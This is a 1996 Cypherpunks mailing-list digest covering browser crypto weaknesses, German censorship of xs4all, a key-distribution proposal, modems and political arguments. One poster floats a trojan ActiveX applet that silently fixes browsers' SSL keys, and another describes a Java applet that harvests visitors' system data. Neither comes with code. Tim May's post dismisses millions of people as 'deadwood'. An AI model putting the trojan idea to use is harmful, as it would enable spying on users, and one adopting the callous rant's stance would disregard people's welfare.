(pgut001 at cs.auckland.ac.nz) Date: Mon, 16 Sep 1996 00:13:59 +0800 Subject: [Long] A history of Netscape/MSIE problems Message-ID: <84279182110737@cs26.cs.auckland.ac.nz> >>[...] The reason for the 40-bit key and (according to RSADSI, the >>company that developed RC4) the reason why details on it were kept >>secret was that these conditions were required under an agreement >>between the Software Publishers Association (SPA) and the US >>government which gave special export status to the RC4 algorithm and >>a companion algorithm called RC2. > >Hadn't heard that before, that the trade secret requirement was imposed on >RSADSI. What was your source for that info, it is an interesting assertion on >the part of RSADSI, and I am intrigued. It's in AC II, p.319 (I was getting worried for a minute, I missed it the first time I looked and then couldn't figure out where I'd got the info from). >You ought to reference Andrew Roos paper [posted to the list, and sci.crypt, >at least] analysing key schedule biases in RC4. It's mentioned in the list of minor RC4 weaknesses. I didn't include refs for all of these because I've already probably got as many references in there as text (the term "reference terrorism" has been used to describe some of my papers in the past). >Strangly (I'm not sure if anyone lost money due to this), I think Netscapes >prices hardly suffered, perhaps even improved slightly. Could be due to the >`any publicity is good publicity' syndrome. There was a *lot* of publicity, >and Netscapes response in fixing the problem was good. Several US cypherpunks >were tracking the stocks at the time, and could probably verify this. Interesting... does anyone want to comment on this? This kind of damages one of my assumptions in the paper that publicity attacks can hurt a company providing poor security. Could it be that at the time people would buy Netscape stock no matter what happened? If MSIE had been widespread at the time, would it have caused people to jump ship en masse? >One omission: you didn't say anything about Paul Kocher's timing attack on >RSA, which I think affected Netscape servers, and was fixed after his >publicizing the attack. Then you could discuss Ron Rivest's blinding >solution, and the time delay solution. It's a pretty obscure attack and one which most implementations (ones running on home PC's) won't ever need to worry about, given that it's many times easier to get a victim to download some whiz-bang ActiveX applet which quietly patches their browser to use a fixed key for all SSL sessions. Has anyone thought of doing this? If I had a system (and compiler) capable of building ActiveX apps I'd love to do this - create an espionage-enabling screen saver or something. Peter. From liberty at gate.net Sun Sep 15 09:28:17 1996 From: liberty at gate.net (Jim Ray) Date: Mon, 16 Sep 1996 00:28:17 +0800 Subject: [Noise] Shopkeepers Preventing Riot Redistribution Message-ID: <199609151328.JAA16180@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: EALLENSMITH at ocelot.Rutgers.EDU, cypherpunks at toad.com Date: Sun Sep 15 09:26:45 1996 EALLENSMITH at ocelot.Rutgers.EDU wrote: ... >... the "redistribution" from > producers ("rich") to welfare drones ("poor") during the Rodney King > riots > would have been nicely prevented by some shopkeepers with automatic > weapons. Indeed, it was. In a beautiful-to-me scene which Miami's WSVN, Channel 7 (our big-hair station) called "chilling," Korean-American shopkeepers, perched atop their building with semi-automatic firearms, kept one block safe while the rest of the neighborhood burned without police protection. Upon being informed that this was a biased interpretation of legitimate actions by the merchants, which _I_ found heartwarming, they said that chilling was "just a word." JMR -- "'Media bias' is just 2 words." Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjwEGm1lp8bpvW01AQExZQQAm6mj+Oi+4+sd72j79f+S3vYxy2rKY6TR OTwDChBPe9pgswg1wAR7uRVwXN1UlsB2NqHTsQhuU9/D+Te9ncZdpqowoyVZRqUG /1NSA8NA9WMOEjW0OoyXCw6EIYOxBvwDqTpxokF4RfLBlVzyYVJVnvnSXMDzkJ4O gh922BlaqRg= =DLRS -----END PGP SIGNATURE----- From tank at xs4all.nl Sun Sep 15 10:29:38 1996 From: tank at xs4all.nl (tank) Date: Mon, 16 Sep 1996 01:29:38 +0800 Subject: URGENT: Final draft GLOBAL ALERT: German Government censors dutch site www.xs4all.nl Message-ID: <199609151412.QAA19956@xs1.xs4all.nl> Stanton McCandlish suggested some important corrections. I changed the draft accordingly and extended the sign-on deadline with one day. Please sign on for your organisation to the following alert NOW, deadline: Tu. sept. 17th 24.00 hr. GMT. I added already some (default) signatures, let me know before the deadline when you want your signature deleted. After the deadline I'll make this alert public on Wednesday sept. 18th (again: provided I don't get serious objections!). Arie *** GLOBAL ALERT *** (not yet) FOR IMMEDIATE RELEASE SEPT. 18, 1996 - Please redistribute this document widely with this banner intact - Redistribute only in appropriate places & only until 15 October 1996 Global Alert: German Government Pushes Blockage of Netherlands Web Sites At the behest of, and in response to legal threats from, the German government, internet providers in Germany have blocked the Dutch Web site Access For All (www.xs4all.nl), removing German users' access to the entire xs4all system. The German government demanded this action because xs4all hosts a Web "home page" with so called left-wing political content that, though fully legal in the Netherlands, is allegedly illegal in Germany. (see: http://www.anwalt.de/ictf/p960901e.htm). As a result of this action, *all* xs4all web sites, including several thousand that have nothing to do with the offending home page, are unavailable to readers in Germany. Please send a letter of protest to the German ambassador in your country, ask your foreign minister to protest officially to the German government, and distribute this alert as widely as possible online and to the press. Referring to article 19(2) of the International Covenant on Civil and Political rights, which Germany ratified in 1973, we, the undersigned organizations, consider this censorship an illegal act. Additionally, the value of attepting to ban content the German government finds offensive is highly questionable. The proper response to offensive expression is more and better expression, and prosecution of offending criminals, not censorship. As a result of the overly broad censorship measure which targets and entire Internet access provider instead of a specific user, all 3000 and more Web site hosted by xs4all are virtually inaccessable in Germany.The loss of clients who market in Germany has resulted in economic damage to xs4all. The immeasurable harm of censoring thousands of other users for the speech of one is even greater. Access for All, though it has expressed willingness to assist the Dutch police in identifying online criminals abusing the xs4all system, has a policy against censoring its clients. Mirroring this position, at least one German Net provider has responded to the government demands with skepticism, pointing out that their compliance with the censorship request may cause them to violate contracts with their own German users, and that the governments liability threats are tatamount to holding a phone company liable for what users say on the telephone. Instead of the futile act of censorship that has simply drawn increased attention to the offending material and resulting in its widespread availability on other sites throughout the world, the German government should have acted through legal channels and asked that the authorities in the Netherlands take appropriate actions. We are concerned that German internet providers have cooperated so easily with government censorship efforts. Some level of cooperation was probably assured by underhanded and rather questionable police threats of system operator liability for user content, but we must urge more resistance on that part of Net access providers to such online censorship schemes. As with libraries, there are many who would censor, but there is a responsibility on the part of providers of access to information, to work to protect that access, else libraries, and Internet service providers, lose the reason for their existence. We demand that the German government refrain from further restrictive measures and intimidation of internet providers and recognize the free, democratic, world wide communications represented by the Internet. All governments must recognize that the Internet is not a local, or even national, medium, but a global medium in which regional laws have little useful effect. "Top-down" censorship efforts not only fail to prevent the distribution of material to users in the local jurisdiction (material attacked in this manner can simply be relocated to Italy or Antigua or any other country), but constitutues a direct assault on the rights and other interests of Internet users and service providers in other jurisdictions, not subject to the censorship law in question. For press contacts, and for more information about the Internet, see homepages for the signatories to this message: DB-NL (Digital Citizens Foundation in the Netherlands) * http://www.xs4all.nl/~db.nl ALCEI - Electronic Frontiers Italy * http://www.nexus.it/alcei CITADEL-E F France *http://www.imaginet.fr/~mose/citadel CommUnity (UK) * http://www.community.org.uk Electronic Frontier Canada * http://www.efc.ca/ Electronic Frontier Foundation (USA) * http://www.eff.org Other signatures: Please send the signature of your organisation to me that I can add it to this alert. Arie Dirkzwager, Board member of DB-NL (Digital Citizens Foundation in the Netherlands). From tank at xs4all.nl Sun Sep 15 10:42:52 1996 From: tank at xs4all.nl (tank) Date: Mon, 16 Sep 1996 01:42:52 +0800 Subject: I could get arrested by German authorities (German censorship) (fwd) Message-ID: <199609151421.QAA20176@xs1.xs4all.nl> A letter from Felipe Rodriqeuz, chairman of XS4ALL internet. Forwarded message: > From felipe at xs1.xs4all.nl Sat Sep 14 22:34:56 1996 > From: Felipe Rodriquez > Message-Id: <199609142034.WAA29923 at xs1.xs4all.nl> > X-Length: 00001286 > Subject: I could get arrested by German authorities (German censorship) > To: declan at well.com, hkunzru at wired.co.uk > Date: Sat, 14 Sep 1996 22:34:52 +0200 (MET DST) > Cc: barlow at eff.com, lr at wired.com, rena at bionic.zer.de, > geert at xs4all.nl (Geert Lovink), patrice at xs4all.nl (Patrice Riemens), > boom at xs4all.nl (Marianne van den Boomen), > fvjole at xs4all.nl (Francisco van Jole) > X-Mailer: ELM [version 2.4 PL25] > MIME-Version: 1.0 > Content-Type: text/plain; charset=US-ASCII > Content-Transfer-Encoding: 7bit > > Hi, > > I got a message from Lorenz Lorenz-Meyer, Editor DER SPIEGEL online. He > spoke to the German Authorities and got some shocking news. > It seems that there is a possibility that I, as CEO of Dutch > internetprovider Xs4all, could get arrested by German authorities. > > This seems a bit far-off, but he is not the only person that > warned me about this possibility. People in the left-wing movement > in Holland have informed me about the agressive behaviour of the > German government against the Radikal publications. Subscribers > have been violently arrested in the past. It was also predicted > by them that the German Authorities would not easily stop their > censorship of radikal. There seems to be a lot of old pain. > > Contemplating a bit further about the risk of being arrested, > I thought about these developments on a larger scale. The first > thing that popped to mind is that all the owners of the Radikal > mirror-sites may also be arrested if they ever visit Germany. These > are over 30 people and organisations. One of the sites Radikal was > mirrored on is EFF. The Board-members of EFF could, in theory, > be held responsible by the German Authorities. John Perry Barlow > could be arrested next time he comes to give a lecture in a > German city, because the EFF has illegal German documents on > it's website. Declan McCullagh has put the Radikal information > in the Well. He and the managers of the Well might be questioned > when they enter Germany. Et cetera. It would be an outrage if > anything like this happens, but friends and this journalist told me > that it could happen to me anytime I travel to Germany. > > I'm tempted to disconnect the Radikal pages from Xs4all, because > of this intense intimidation. But if Xs4all would bend to this kind > of intimidation, we would create a precedent. The Germans might see it as > a 'reward' for their acts. They'd be stimulated to continue on this > road, and may become an example for other countries. > Imagine if every country would have these standards. Any country can > order their own ISP's to block a certain foreign site. Imagine the > authorities of those countries have the powers to prosecute against > foreign ISP's when they visit their country, or when they are extradited. > These acts of agression against ISP's and internetusers will profoundly > change the Internet if they'd be tolerated. > > The possibility of being arrested in our neighbour country is almost > too surreal to think about. But now people start telling me to seriously > prepare for it, in case it may happen. It would not be the first time > a foreign citizen was arrested and put in jail by the Germans for > dissiminating information. Just a couple of weeks ago a US citizen > was arrested by the Germans because he sent nazi documentation to > Germany through the mail, i think his name was Koch, but i'm not > sure. > > > Here is the message lorenz sent me: > > Date: Sat, 14 Sep 1996 13:13:52 +0200 > To: felipe at xs4all.nl > From: Lorenz Lorenz-Meyer > Subject: third attempt > > Hi Felipe, > > I just had an extensive and controversial talk > via phone with Mr. Hannich, spokesman of the german > Generalbundesanwalt, about the legal action taken > against the distributors of "radikal". As is the > nature of talks with official spokespersons it was > not utterly satisfying. But anyway. Just one question: > > The possible targets of german public > prosecution are not only german ISPs. > There are 'preliminary proceedings' of the > Bundesanwaltschaft against 'unknown' - i.e. > the persons responsible for making > "radikal" accessible in Germany over > the Internet, _even if they are in foreign > countries_. I'm afraid that this already includes > you. Have you been notified of this fact? > And do you have plans to guard/defend yourself? > > Regards, > > Lorenz. > > > > From paul at fatmans.demon.co.uk Sun Sep 15 13:18:19 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 16 Sep 1996 04:18:19 +0800 Subject: Fed appellate judge remarks re anonymity, free speech o Message-ID: <842781745.23335.0@fatmans.demon.co.uk> > >The article quotes Kozinski as saying "I have a severe problem with > >anonymous E-mailers . . . You don't have a right to walk up to somebody's > >door and knock with a bag over your head." The article says Kozinski likened > >anonymous E-mail to menacing someone. What is the offense involved then, going bagged in a public place? since when do I or anyone else not have the right to wear a bag on my head? Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From hallam at ai.mit.edu Sun Sep 15 15:19:49 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Mon, 16 Sep 1996 06:19:49 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: <51foeg$5ea@life.ai.mit.edu> Message-ID: <323C563B.4A7B@ai.mit.edu> Steven Weller wrote: > > >Perry E. Metzger wrote: > >> > >> Yes, we could be a workers paradise like one of those lovely European > >> countries with double digit unemployment and all. Too bad we didn't go > >> in for democratic socialism while we could have, eh? > > > >Perry, hate to burst your bubble but unemployment in the UK _trippled_ > >in the first eighteen months of rule by that great socialist Margret > ^^^^^^^^^ > >Thatcher. One third of UK manufaturing industry went bankrupt in the > >only large scale application of Freedman's ideas. > I think she was a little bit Tory. Conservative, maybe? Right wing? Funded > by industry? On kissing terms with Reagan? Socialist, no. Or was this an > attempt by Doctor Sarcasm at wit? Its difficult to know what the US definition of "socialism" is. Particularly on Cypherpunks. I would consider it reasonable to call Thatcher a statist and authoratarian which many on the list consider to be the definition of socialism. > Actually the UK is now way ahead of the rest of Europe in terms of > deregulation, low labor costs, efficient manufacturing, etc. Germany and > France are now up the familiar creek because of their too-socialist > policies. But there are those who say that Thatcher's slash and burn > approach was appalling. I would prefer to have the ecconomic figures for any European country over those of the UK. At the start of the Conservative rule the UK was the second biggest ecconomy. Today we have just been overtaken by Spain. Italy and France overtook long ago. With the exception of the UK the politics in Europe are much more left wing than those of the states. Excluding Major there is no European head of government to the right of Clinton. Its not really a case of "too socialist" as the natural rotation of power amongst the parties. Phill From camcc at abraxis.com Sun Sep 15 15:35:33 1996 From: camcc at abraxis.com (camcc at abraxis.com) Date: Mon, 16 Sep 1996 06:35:33 +0800 Subject: (fwd)Atlanta NRC Cryptography Briefing Message-ID: <2.2.32.19960915191513.0068f0b0@smtp1.abraxis.com> >X-Sender: splatter at pop.io.com >Date: Sat, 14 Sep 1996 22:36:19 -0400 >To: 2600 at ninja.techwood.org, efg-action at ninja.techwood.org >From: myron.cramer at gtri.gatech.edu (Myron L. Cramer) (by way of * ) >Subject: [EFG] BoS: c4i-pro Atlanta NRC Cryptography Briefing >Sender: owner-efg-action at ninja.techwood.org >Reply-To: efg-action at ninja.techwood.org > >myron.cramer at gtri.gatech.edu (Myron L. Cramer) > > I am hosting a presentation by Dr. Herb Lin of the prestigious National >Research Council (National Academy of Science). He is the director of >their recent study on Cryptography. > > Cryptography is the key technology that underlies anything being done to >secure the internet or to make electronic commerce a reality. Policies >controlling the use of modern cryptographic technologies will determine the >future feasability of the internet for business both in the near and far >terms. > > National cryptography policies also significantly impact on the >capabilities of the intelligence and law enforcement communities. > > Feel free to forward the following notice to anyone you think would be >interested in attending. > > Thank you. > > Myron Cramer > >------------------------------------------------------------------------ > Presentation > October 21, 1996 > > "Cryptography's Role in Securing the Information Society" > > Dr. Herb Lin > National Research Council > > >Cryptography, the work of creating and deciphering coded information using >mathematical formulas, long has been the sphere of spies and the military. >But in the past 10 years private-sector use of cryptography has exploded as >a result of advances in electronic communications and information >technologies. Decisions about national cryptography policy now have >important implications not only for national security, but also for U.S. >economic competitiveness, law enforcement interests, and the protection of >the privacy and other rights of individuals. The Computer Science and >Telecommunications Board of the National Research Council recently >completed a congressionally mandated study to examine the issues and >conflicting interests involved in cryptography and made recommendations on >national policy in this highly controverial area. > >There will be a public briefing in Atlanta, Georgia by the National >Research Council on this report. The briefing will be held at the >Manufacturing Research Center on the campus of the Georgia Institute of >Technology on Monday October 21, from 1:30 to 3:30. Dr. Herbert Lin, >director of the NRC study will conduct the briefing. Questions from the >audience will be entertained. > >For further information, please contact Dr. Myron L. Cramer (404) 894-7292, > at the Georgia Tech Research Institute. > >The event is open to the press and the public. > >Directions: From I-75/85 exit on Tenth Street and head West. Turn left on >Hemphill Street and follow it to where it ends on Ferst Street. The >Manufacturing Research Center is the modern building in front of you. >Parking is limited; use public transportation or allow yourself extra time. > >This meeting is hosted by the Georgia Tech Research Institute and the >College of Computing. > >__________________________________________________________________________ >Dr. Myron L. Cramer, Principal Research Scientist >Georgia Tech Research Institute (GTRI) | Voice: (404) 894-7292 >400 10th St, Room 554B | FAX : (404) 894-8636 >Atlanta, Georgia 30332-0840 | myron.cramer at gtri.gatech.edu >__________________________________________________________________________ > > > > > From geoff1 at home.net Sun Sep 15 15:52:18 1996 From: geoff1 at home.net (Geoff Dale) Date: Mon, 16 Sep 1996 06:52:18 +0800 Subject: (Long) RFC: Public Key Finger: A preliminary proposal for a distributed key publishing system Message-ID: <199609151909.MAA10901@toad.com> -----BEGIN PGP SIGNED MESSAGE----- The original (html) document may be obtained at: http://www.fqa.com/geoff/pkf.htm - --------------------------------------------------------------------------- Version 0.2, Draft Public Key Finger (aka the People's Key Front) A preliminary proposal for a distributed key publishing system - --------------------------------------------------------------------------- Wouldn't it be nice if distributing your public key(s) was as easy as publishing your e-mail address? As a matter of fact, it would be nice if you didn't even have to do anything more than giving out your e-mail address. Keyfinger is a way to make this possible. Requirements: Simplicity Components must be easy to understand, use, integrate, set-up and maintain. Scalability The system must be designed to be distributed and scale to accommodate large users like Netcom and AOL. To this end keyfinger uses the convention of connecting to keys.host.domain.com, allowing the administrator to use various methods to handle request traffic. Flexibility The system should be designed to allow interim solutions and phased deployment. Because of the fact that this system will not be deployed all at once, interim methods will be designed into the protocol. Security Ideally the fetching of keys should be across secure links, signed by the key-server, to avoid man-in-the-middle attacks. The individual keys should be self-certifying if signed by a known trusted entity (such as the ISP). Protocol: Client opens a socket connection to host (keys.host.domain.com or host.domain.com or domain.com) on designated port (a default port should be determined). Sends and inquiry string (user at host.domain.com) then the Host returns the contents of the .keyplan file. If the connection fails, the client may try to connect using http with a URL of form (http://host.domain.com/~user/.keyplan). Other supported methods may be finger and DNS lookup. Components: keyfinger Program for fetching the key. E-mail programs could incorporate this to allow automated key lookups within the mail authoring and authorization process. Various search engines could use this to allow key searches. Usage: keyfinger user[@host][.domain.com][@keyserver.domain.com][:port] ex: keyfinger geoff1 at home.net Host and domain are resolved in the standard manner, a default port is tbd. The optional usage is to add an actual keyserver which could be used for a more traditional key-server system. keyfingerd Program (daemon) run on isp's key server. Would automatically serve up .keyplan files from user's home directories. Some versions may access a local key database instead. 'Nym servers and e-mail gateways would require this kind of service. The keyfinger server would be responsible for keeping the keyplan entries up to date. keyfinger-proxy Program (daemon) running on firewall to allow keyfinger to run through firewalls. Allows keyfinger-ing of foreign systems from within the firewall, but not the reverse. key-setup Program that provides a gui interface to aid in the account setup. Should be able to work with .keyplan files and key databases. Authentication required to change key info required. .keyplan File in the user's home directory that contains the key information. User's on ISP's that don't provide keyfinger service could publish their .keyplan files in the top level of their web directory (/~/public_html or whatever). The contents would be a multipart mime document containing available keys with key-type (and size) information, perhaps in preference order. Allowable mime parts would also include key-revocation certificates. Note: It is a question as to how strictly these allowable types should be enforced. To allow extension of new key types enforce mime-type: key/... but not subtype (eg - key/pgp ). content-handler Java content-handler for dealing with .keyplan files. Actually a content handler could be written for each key mime-type. The java code could actually use http to do retrieval. protocol-handler Java protocol-handler for dealing with "keyfinger:" URLs. This would essentially be an implementation of the keyfinger component. Usage: keyfinger:user[@host][.domain.com][:port] Action Items In no particular order: * IETF Format Draft * Write reference code * Need port designation * Need mime-types for keys and the .keyplan file. Important Dates * 96-09-07 First Publication to the Coderpunks list. * 96-09-14 Presented to SF Bay Cypherpunks Physical Meeting. - --------------------------------------------------------------------------- Page Maintained by Geoff Dale Last Modified: September 15, 1996 _____________________________________________ Geoff Dale - geoff1 at home.net Paraphrasing Larry Niven: - -- Just think of it as economics in action -- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjxVrv1Xc5SjvRJ5AQEUoAQAnU193QKDiV5wW+Iv+ozfZfEH7cyi/cz3 LqduEO3BGkmW4Xfz/bXCwIwwSph1LEcePt6v0Wv+QUGOTXR/CZqjtxTzr3uCTHvP 0Zd76ZlfLD+JI3NSFniXsAXEeGeYLnQJqSHAa9cGUCYPh3/pgwfBuwNC+ZTgYkJo ghLkuxHXrLE= =4icU -----END PGP SIGNATURE----- From gbroiles at netbox.com Sun Sep 15 16:28:42 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Mon, 16 Sep 1996 07:28:42 +0800 Subject: HipCrime as MetaSPAM Message-ID: <2.2.32.19960915193346.00697e78@pop.ricochet.net> At 02:10 AM 9/15/96 -0700, Bill Stewart wrote: >Just a Hippie Of Crime, not a Hippie Of Clue. Indeed. He's also collecting user data for spams or trojan horse attacks in the future; a disassembly of his VisitorID.class and StealStuff.class files reveals that he's collecting (via Java) data about a user's IP address, email address, operating system, machine class (e.g., processor type), and collecting some filesystem info; the filesystem info collector seems to be prepared to cope with Macs, Windows boxes, and Unix systems. The user data is sent back both as an E-mail message and via HTTP to his home system. As far as I can tell, Netscape 3.0 on Win95 won't let it get any file system info but will let it detect IP addr, processor, and OS. He's also got at least one mostly harmless but annoying JavaScript trick where he opens far too many copies of Netscape; I clobbered it after 9 or 10 windows had opened. (the windows claim to be "formatting your hard disk".) As far as I can tell, he thinks that because some artists have a cynical, grouchy attitude, anything he does while affecting such an attitude is art. What he's lost track of is that some artists are also assholes, and some people are simply juvenile assholes (no art). -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From jimbell at pacifier.com Sun Sep 15 17:40:43 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 16 Sep 1996 08:40:43 +0800 Subject: 56 kbps modems Message-ID: <199609152017.NAA12491@mail.pacifier.com> At 01:31 AM 9/15/96 -0700, Bill Stewart wrote: >Unless they're _really_ talking about ISDN "modems", I'm surprised >to hear somebody saying they can take 56 kbps, turn it into analog, >let the phone company quantize and mu-law the analog into 64kbps, >and still get the original 56kbps back out. But if they can, well, >yee-hah, ISDN is nearly dead :-) (Not totally dead; the signalling is >still useful for some applications, the convenience of two channels on >one wire pair is nice, and the fact that people can get 56kbps without >the phone company's help will pressure them into offering ISDN for >a lower price in areas where the Phone Company's idea of "all the market >will bear" is substantially higher than voice pricing.) If the phoneco was realistic about ISDN value, they'd decide that since anybody can buy a 31k modem for $100 or so, the "value" of a 128K connection is about $400, and then they'd charge based on the actuarial value of this hypothetical one-time fee, at perhaps an interest rate of 5% or so: In other words, about a $20 per year charge, or around $2 per month. Jim Bell jimbell at pacifier.com From tcmay at got.net Sun Sep 15 17:49:23 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 16 Sep 1996 08:49:23 +0800 Subject: Workers Paradise. /Political rant. Message-ID: At 7:08 PM 9/14/96, Asgaard wrote: >The problem with the 100% market economy approach is what to do >with those who just can't get it together, i.e. who buy beer for the >money that should go to health insurance and then fall ill. It's >against basic human instincts to just let them stay in agony. I have no problem with letting them stay in agony (but you all knew this). "Saving for a rainy day," whether saving, investing, getting an education (while others are out partying), preparing, etc., all takes effort and commitment. If those who save and prepare are then told they have to pay high taxes to support those who partied....well, the predictable effect is that many of them will say "I'll just party and let The System take care of me." Thus, the effect of "not letting them stay in agony" is _more_ people in agony. When you tell people that a compassionate society will meet their basic needs, a predictable fraction of them will choose not to work hard and prepare themselves. I say we need to let about 20 million Americans, and a couple of billion in the rest of the world, meet their fate. While I will not _actively_ seek to dispose of them, I will work to make sure they cannot continue to subsidize their lives at my expense. Crypto Anarchy means getting rid of deadwood the old-fashioned way. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jlv at signet.sig.bsh.com Sun Sep 15 18:09:12 1996 From: jlv at signet.sig.bsh.com (Jason Vagner) Date: Mon, 16 Sep 1996 09:09:12 +0800 Subject: Internet Drivers' Licenses In-Reply-To: <199609132026.NAA15888@netcom9.netcom.com> Message-ID: On Fri, 13 Sep 1996, Mike Duvos wrote: > I am now getting more junk email than email from people I > care to correspond with. It seems one can't even read the > scholarly newsgroups anymore without "Come Watch Us Lick > Ourselves on the Web" messages popping up regularly. Not only that, but the newsgroup have all gone to hell with commercial ads. jlv From gnu at toad.com Sun Sep 15 18:41:06 1996 From: gnu at toad.com (John Gilmore) Date: Mon, 16 Sep 1996 09:41:06 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL In-Reply-To: <199609062315.QAA24170@comsec.com> Message-ID: <199609152201.PAA14578@toad.com> > Xs4all Internet will rotate the IP-numbering of the website www.xs4all.nl > to ensure that it's 3100 userpages will all remain available for any > internet-user. While you are at it, you could move just the censored material to a separate IP address from the rest of the archives, and issue Web redirects for requests sent to the old address. In fact it might be interesting to redirect readers to various mirror sites automatically, at random and in rotation. Thus, when someone connects to your web site to read censored material, they will be automatically redirected to one of dozens or hundreds of other places where the material can be found. The German censors will likely find it impossible to block access to all those sites (and each such site can also be changing its IP address periodically). It's my impression that the draft Mobile-IP protocols will make it possible for a site to use IP addresses from all over the Internet. Mobile IP is normally designed for permitting a physical host to move to various physical locations while retaining a fixed logical IP address (corresponding to its "home" location). It can probably also be used to permit a physical host at a single physical location to respond to multiple logical IP addresses at multiple virtual "home" locations. See http://www.ietf.org/html-charters/mobileip-charter.html, or search for "Mobile IP" in a web search engine. The Mobile IP protocols require strong authentication in order to "move" around the network securely. We hope this will prevent them from being used to subvert Internet hosts. However, in the presence of *cooperation* from a variety of Internet sites, they can also be used to make the physical location and Internet-address of actual stored information invisible to the requesters of that information -- and to the censors attempting to block access to it. Curiously enough, the National University of Singapore has implemented Mobile IP for Linux! See http://zaphod.ee.nus.sg/mip/. Even in the backyards of the most egregious censors, freely available technology for combatting censorship is being built and distributed. (A second Linux implementation from http://anchor.cs.binghamton.edu/~mobileip/ is also available.) John Gilmore From adam at homeport.org Sun Sep 15 18:53:16 1996 From: adam at homeport.org (Adam Shostack) Date: Mon, 16 Sep 1996 09:53:16 +0800 Subject: Reputation in action In-Reply-To: <7654f2dw3r@netcom.com> Message-ID: <199609152246.RAA17894@homeport.org> Greg Burk wrote: | Well, this looks like a chance to quickly correct some mistakes without | spending a lot of time framing the issue. | | tcmay at got.net (Timothy C. May) writes: | > But this latest episode illustrates the role of reputations. Namely, my own | > reputation is not being harmed by bizarre commentaries from the Vulis-bot. | And it seems to me that your usage of "reputation" has at different | times meant both direct and indirect exposure. This clearly discards | important information, often to the detriment of your analysis. Perhaps | you can explain why the two separate things are the same in some | important way, aside from merely that they both involve esteem. A while back (Sept 94) I sketched out a system for using a numeric indicator (from -1 through 1) as an indicator of how interested (likely to read) you were in someone else's postings. I suggested that simple multiplication could achieve useful results. If I respect Alice 50% of the time, and Alice respects Bob 50% of the time, then a rough cut at my interest level in Bob would be 25%. If Alice disrespects Charles 90% of the time, that gives him a negative 45% in my book. By generating simple numbers like this, I can tune my tolerance level based on time. Its not perfect, but roughly works. Deranged Mutant pointed out that radically different opinions by a few people might cause the system to start behaving chaoticly, and Hal also had some interesting comments. Check the archives. | > In the mathematics of reputations, a negative reputation held by one whose | > own reputation is negative is a positive. | | I don't think this is an example of any such thing. I would not respect | a person even a tiny bit more just because a kook disrespects them. In | fact, since the kooks frequently hold each other in very low esteem, the | suggested polarity-math is self-contradictory. | | Rather, I think this is an example of how direct exposure supercedes | reputation. Kooks do mess things up a bit; but most people aren't kooks. My enemies enemy is my friend is oft true. In the system I outlined, direct exposure clearly does supercede reputation, except in the (possibly rare) case where you respect someone else more than you respect yourself. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jf_avon at citenet.net Sun Sep 15 18:53:24 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Mon, 16 Sep 1996 09:53:24 +0800 Subject: Fed appellate judge remarks re anonymity, free speech o Message-ID: <9609152200.AA06978@cti02.citenet.net> On 14 Sep 96 at 20:14, paul at fatmans.demon.co.uk wrote: > >The article quotes Kozinski as saying "I have a severe problem with > >anonymous E-mailers . . . You don't have a right to walk up to > >somebody's door and knock with a bag over your head." The article > >says Kozinski likened anonymous E-mail to menacing someone. > What is the 